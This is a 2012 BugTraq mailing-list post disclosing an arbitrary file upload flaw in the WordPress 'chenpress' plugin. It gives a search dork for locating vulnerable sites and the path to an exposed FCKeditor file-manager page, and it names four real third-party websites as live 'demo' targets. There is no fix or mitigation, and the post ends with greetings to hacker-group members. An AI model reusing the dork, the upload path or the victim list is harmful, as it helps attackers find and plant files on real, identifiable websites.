BugTraq
Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability Jul 21 2012 07:50AM
Amir irist ir (1 replies)
a bug in Wordpress (chenpress Plugin) that allows to us to occur
a File Upload on a Remote machin.

########################################################################
################
#
# Exploit Title : Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability
#
# Author : IrIsT.Ir
#
# Discovered By : Am!r
#
# Home : http://IrIsT.Ir/forum
#
# Software Link : http://wordpress.org
#
# Security Risk : High
#
# Version : All Version
#
# Tested on : GNU/Linux Ubuntu - Windows Server - win7
#
# Dork : inurl:"wp-content/plugins/chenpress"
#
########################################################################
################
#
# Expl0iTs :
#
# http://target.com/wp-content/plugins/chenpress/FCKeditor/editor/filemana
ger/browser/mcpuk/browser.html
#
#
# D3mo :
#
# butcherboysonline.com/wp-content/plugins/chenpress/FCKeditor/editor/file
manager/browser/mcpuk/browser.html
#
# atletismosuanzes.com/wp-content/plugins/chenpress/FCKeditor/editor/filem
anager/browser/default/browser.html
#
# carnadas.org/blog/wp-content/plugins/chenpress/FCKeditor/editor/filemana
ger/browser/default/browser.html
#
# downtheaisle.ca/wp-content/plugins/chenpress/FCKeditor/editor/filemanage
r/browser/default/browser.html
#
########################################################################
################
#
# Greats : B3HZ4D - Crim3R - nimaarek - 0x0ptim0us - R3ZA BLACK HAT - TaK.FaNaR - m3hdi - F@rid
#
# H4x0r - dr.tofan - skote_vahshat - d3c0d3r - Dr.Security - Mr.Xpr - Bl4ck_king - hellboy
#
# Siamak_Black - Shekaf & All Members In IrIsT.Ir
#
########################################################################
################

[ reply ]
Re: Wordpress (chenpress Plugin) Arbitrary File Upload Vulnerability Jul 24 2012 07:01AM
Henri Salo (henri nerv fi)


 

Privacy Statement
Copyright 2010, SecurityFocus